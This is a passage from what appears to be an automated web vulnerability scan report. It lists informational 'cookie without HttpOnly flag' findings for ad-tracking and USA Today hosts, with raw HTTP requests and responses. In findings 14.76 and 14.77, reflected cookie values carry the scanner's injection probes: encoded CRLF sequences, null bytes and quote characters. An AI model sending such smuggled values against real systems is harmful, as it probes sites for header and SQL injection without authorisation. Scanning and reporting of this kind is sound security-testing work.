udm_0=MLv/9FEJUSpn5l6pVFGFtoFPcNiZQXEmRfNYGCemmjfgrpYXr01sQ9tiT8EX00BRV94CRgAU+Cx+A1UyfYZNMCAyWVxgaMJPGkf8TFIlYXlki3Za8SZrHQcbAAHtzBKuHN1WnZO/FADdFtbQ4tTcDTv+/Xlt+BhYtDIVpaeByA0iypN5Q1/ovDhNl5rC75OYkwLvQ+PNALghcwtRNb5XQkE/e736rwI59LV+Lxcr6hqYtoSa0Y7NmcqmxdooVTFg8d9OkXAe/nA0Pv09oobrkR1sPhh4bpWCMXXgcnIXJhRZL+WmuuhUNICfUwoHrSnfNd7INRqbEKlrkyI4ranyBdGGDnfpMhZ4d70tSL78Wzix96AC37O8TjtMhOyNvZtMEqM3Vu430adx2g6NcgghcyBCd/4ZD11sEyYhtAVGsixJ9D/eNU5p5xq8uXL62d3u/+3GJw/j/OmHcrDVGO1Ets+Ml/G2x8IfPGrQ6BXlnVPkZ0Yb0DLjAe/Mlto3nTqXnqLZJtNb+TCCZgNCcA4D1t8TtjhkqPedaX74wLR/4PIrwHSr9l/ZtT0andQyxYusw/hmtZVIFFrzRGki+nKKU+DfZzsBVISF3gY636fNNZGUnxnT+qoUbza+WQ5nu4y+xgvM3rX0KCpaI9y4j+M2HLlBBe0Y66nyTZhgnberGlUfyGAREOYcmLefKqQ8vnPRH34tstpiLW8fVZymfgXFnOrHvEfIkajgy5PFOicYxMmRwPaxj3cxb/4LuZmv/rC5Pk0o5fWR77B8xzpw4B3wE0nnO1GT7gpH7oiyCu3p7BKVkMayCiP7wU3LSaSVJMh6rwvMlxBnhqJQ7I8o2/N/s/zBI3sOWJ1RjDG/QWxgo2bY9PHDrgr9EMCvN2YESZZxIO3sQnvBDpmvkmA9SYEb4uffYOulKcagBZoDKaBk3xg90muYx0Yn5GskyQmwvnxYGwPebHzI8jqsMy3/N5N7mdMOlZs+AzRNfDK8eQetzUS3jUEu7evMgTUnNpAw5xNxCd7mkwJCzD3R2FhhUMXPIJpvkl5LUakIjQnacYISFbBXQ5VKvjBs3ArBfhOvf1PaJ7iQIYF9u8LFr5BnIQIb+A6fps+n3volzB+ugnGU8HH1EP+e0NI1L2C42QJVScul2+QNW4lkxtS0gX5W1qspjaE+hy9HSkd9; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeU/F7gMQlVNWye4WT+7FVcYUPosPyzLn7mCqBpJakqVFftDs8Pd8XH9p7LJOSgsdxA97zNjRBumoSHminWw7EeAr70CWFMXT8ZaoCiV1MiuKvp5QCBbboY8YnCOuCjLvt0/4MIf99AC7ZSY0w5C77Q6CoOArG5YEiepgrvMcmFjpSrPze/ZFTj8/JoWhtW9419+hEUht9d1eloKUu9z3BV+2PuPu; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv/9FEJUSpn5l6pVFGFtoFPcNiZQXEmRfNYGCemmjfgrpYXr01sQ9tiT8EX00BRV94CRgAU+Cx+A1UyfYZNMCAyWVxgaMJPGkf8TFIlYXlki3Za8SZrHQcbAAHtzBKuHN1WnZO/FADdFtbQ4tTcDTv+/Xlt+BhYtDIVpaeByA0iypN5Q1/ovDhNl5rC75OYkwLvQ+PNALghcwtRNb5XQkE/e736rwI59LV+Lxcr6hqYtoSa0Y7NmcqmxdooVTFg8d9OkXAe/nA0Pv09oobrkR1sPhh4bpWCMXXgcnIXJhRZL+WmuuhUNICfUwoHrSnfNd7INRqbEKlrkyI4ranyBdGGDnfpMhZ4d70tSL78Wzix96AC37O8TjtMhOyNvZtMEqM3Vu430adx2g6NcgghcyBCd/4ZD11sEyYhtAVGsixJ9D/eNU5p5xq8uXL62d3u/+3GJw/j/OmHcrDVGO1Ets+Ml/G2x8IfPGrQ6BXlnVPkZ0Yb0DLjAe/Mlto3nTqXnqLZJtNb+TCCZgNCcA4D1t8TtjhkqPedaX74wLR/4PIrwHSr9l/ZtT0andQyxYusw/hmtZVIFFrzRGki+nKKU+DfZzsBVISF3gY636fNNZGUnxnT+qoUbza+WQ5nu4y+xgvM3rX0KCpaI9y4j+M2HLlBBe0Y66nyTZhgnberGlUfyGAREOYcmLefKqQ8vnPRH34tstpiLW8fVZymfgXFnOrHvEfIkajgy5PFOicYxMmRwPaxj3cxb/4LuZmv/rC5Pk0o5fWR77B8xzpw4B3wE0nnO1GT7gpH7oiyCu3p7BKVkMayCiP7wU3LSaSVJMh6rwvMlxBnhqJQ7I8o2/N/s/zBI3sOWJ1RjDG/QWxgo2bY9PHDrgr9EMCvN2YESZZxIO3sQnvBDpmvkmA9SYEb4uffYOulKcagBZoDKaBk3xg90muYx0Yn5GskyQmwvnxYGwPebHzI8jqsMy3/N5N7mdMOlZs+AzRNfDK8eQetzUS3jUEu7evMgTUnNpAw5xNxCd7mkwJCzD3R2FhhUMXPIJpvkl5LUakIjQnacYISFbBXQ5VKvjBs3ArBfhOvf1PaJ7iQIYF9u8LFr5BnIQIb+A6fps+n3volzB+ugnGU8HH1EP+e0NI1L2C42QJVScul2+QNW4lkxtS0gX5W1qspjaE+hy9HSkd9; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:27 GMT
Content-Length: 384

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126'];
if(typeof(D
...[SNIP]...

14.69. http://pix04.revsci.net/F09828/a4/0/0/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzs01SB6Qb/nXlD7g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzs01SB6Qb/nXlD7g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

14.70. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I07714/b3/0/3/1008211/954068462.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFOE/F7gMQlrWdY9siSkqZE680dIsPyzLv7mCqBpJakqVFftDs8Pd8XH9p7LJOwoH+goYpPfri7ZTBvzBVf7SOFPaRj1HOKpjRvpAKtGje2Y3H4h//EkEw6Msyj40HEwS7e/06Sy9s4k8kNE/WoHW1C3nb6NhUPrzhVTUm0po5pvG/x2yipyOcnl8CyX8Ph5nifpkExZWQ1HO8VTJph99aLekgIJGcAHFOegq+bzrVdQKxKeDFmBZN; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
rtc_UUza=MLs38KNKcS5r5tIYsrgdBK11VmsPcJHEjh8FB4XxHMaJAW/yCsbueTOkM2I7/XCjGGDtu+H38Zi6DHtu6Jz2s/guplcWn9G+mKtXFNPD/GT0al2wX2OBBe5NhmRfx9Rtvi6+OYVG6B1HLTS/fubkWk/2Wr78IBEZfcQxbxZvLdlubczCSL5h9Xp2CZ5Ijou+QGBVYRzisz4PopFv7MEjzqqaMCMg8LhoUIRHIs+zFGlNMSXDVqlePNr2XGUHXlldp1DKQuzQ5FdkU0lSEeGT/NPMnqL/Dbs5RFmVr7vZtTHuI+MRsgjd+zdbPV0cdxij9ktIroXW6Um2lEkmDOqyF3jm+2i0BB6G3+YQcPhnogcX7yYHIAvY5J9uDXxtglmIJZmS+ZIPR8fGb8dBgNdnl1XQT5gJYx8ZGap1GsVz5R14Aosznra92XixAfy5jHEePiNeZRRs1lXlJ4UtJPzvobtA/LLyl1ewk7GYvp999XJW; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.71. http://pix04.revsci.net/J06575/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzsU1dB6gb/nWtD4g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzsU1dB6gb/nWtD4g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 672

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{
...[SNIP]...

14.72. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/b3/0/3/1008211/846374105.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJZLPlvN//lxCH/uYAwhrfLSEX/SETDPrLJfdcbwXj53YnjCTmjiXQQq1X7wFKW9k6/hM5xcabUnvVsTMBn+JFsrOOXsOsyVZ24LbrPbU7Qy1eQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
rtc_ouyE=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIPllZLMTR5d1cXDb2nHulG0vOSeoml1m03ilSbH+UDzM8ahhkyEaJIjsQemYPTPhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRdff7eSUvvXICfDWxc4bNSGk1cDx7BeF4VVH4blUATRCMCwARw0RFX3+FxhEN+3PO9ruFkmpBvIfPIfFcuxKb+JB8G9m7Y45Nn9cxH24FRAL/5a0q4smMaLz5gxlgZJ0DWNQ=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.73. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EMEBBgHQBw; expires=Sat, 03-Dec-2011 01:05:08 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.74. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.pixel.rubiconproject.com
put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.75. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C2%2C%2C%267751%3D14657%2C0%2C65%2C%2C; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.pixel.rubiconproject.com
put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.76. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%2624831%0D%0A4e77fd0dd5f%3D1%2684555%250d%250a76073097ace%3D1%261e49b%00%0D%0A021fe9e2610%3D1%265364e6226%0D%0A20a447c6f1a%3D1%26536489345%250d%250a30a7789986a%3D1%265364c2fb0%00%0D%0Aef4d9f296de%3D1%265364%27%3D1%265364%2527%3D1%265364%00%27%3D1%265364%22%3D1%265364%3D1%264212%3D1; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C29%2C%2C%267751%3D14656%2C0%2C1%2C%2C6069c2e8bf59d5d46e70329b%2624831%0D%0A4e77fd0dd5f%3D14657%2C0%2C1%2C%2C%2684555%250d%250a76073097ace%3D14657%2C0%2C1%2C%2C%261e49b%00%0D%0A021fe9e2610%3D14657%2C0%2C1%2C%2C%265364e6226%0D%0A20a447c6f1a%3D14657%2C0%2C1%2C%2C%26536489345%250d%250a30a7789986a%3D14657%2C0%2C1%2C%2C%265364c2fb0%00%0D%0Aef4d9f296de%3D14657%2C0%2C1%2C%2C%265364%27%3D14657%2C0%2C1%2C%2C%265364%2527%3D14657%2C0%2C1%2C%2C%265364%00%27%3D14657%2C0%2C1%2C%2C%265364%22%3D14657%2C0%2C1%2C%2C%264212%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.pixel.rubiconproject.com
put_1185=2925993182975414771; expires=Thu, 03-Nov-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.77. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%2663ab8%0D%0A01bb4e98c34%3D1%262f3e7%250d%250abefce76579c%3D1%26658e0%00%0D%0A6b8eb56a945%3D1%264210330d2%0D%0A8b1ecee0312%3D1%26421091ced%250d%250af3ebd5f25d3%3D1%264210aa2c8%00%0D%0A9382c866592%3D1%264210%27%3D1%264210%2527%3D1%264210%00%27%3D1%264210%22%3D1%264210%3D1%267751%3D1; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C6069c2e85f977687d81d3d36%264210%3D14657%2C0%2C32%2C%2C%2663ab8%0D%0A01bb4e98c34%3D14657%2C0%2C1%2C%2C%262f3e7%250d%250abefce76579c%3D14657%2C0%2C1%2C%2C%26658e0%00%0D%0A6b8eb56a945%3D14657%2C0%2C1%2C%2C%264210330d2%0D%0A8b1ecee0312%3D14657%2C0%2C1%2C%2C%26421091ced%250d%250af3ebd5f25d3%3D14657%2C0%2C1%2C%2C%264210aa2c8%00%0D%0A9382c866592%3D14657%2C0%2C1%2C%2C%264210%27%3D14657%2C0%2C1%2C%2C%264210%2527%3D14657%2C0%2C1%2C%2C%264210%00%27%3D14657%2C0%2C1%2C%2C%264210%22%3D14657%2C0%2C1%2C%2C%267751%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.pixel.rubiconproject.com
put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.78. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=4e28a2c0-3fbe-4680-b440-7249a1d4d410; expires=Tue, 03-Sep-2013 01:23:25 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set HTTP/1.1
Host: r.openx.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.79. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3033228098597162936; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3033228098597162936; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:00 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3033228098597162936&rnd=3093449532631709493&fpid=4&nu=n&t=
...[SNIP]...

14.80. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:48:45 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.81. http://segments.adap.tv/data previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"42\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.82. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"41\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:00:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"41\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:00:43 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

14.83. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/images/no-user-image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/no-user-image.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 498
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:33:28 GMT
Accept-Ranges: bytes
ETag: "d856eb3d1d68cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

GIF89a:.:....................................................................................................!.......,....:.:.... $.di.h..l..p,.tm... .....p.x..GE. .%..(Rph......`ZU...X.~M...p6-..q.M.
...[SNIP]...

14.84. http://sitelife.usatoday.com/ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 1460
Content-Type: image/jpeg
Last-Modified: Sat, 03 Sep 2011 20:44:32 GMT
Accept-Ranges: bytes
ETag: "fb14af487a6acc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

......JFIF.....`.`.....C......................... ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

14.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449690983; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
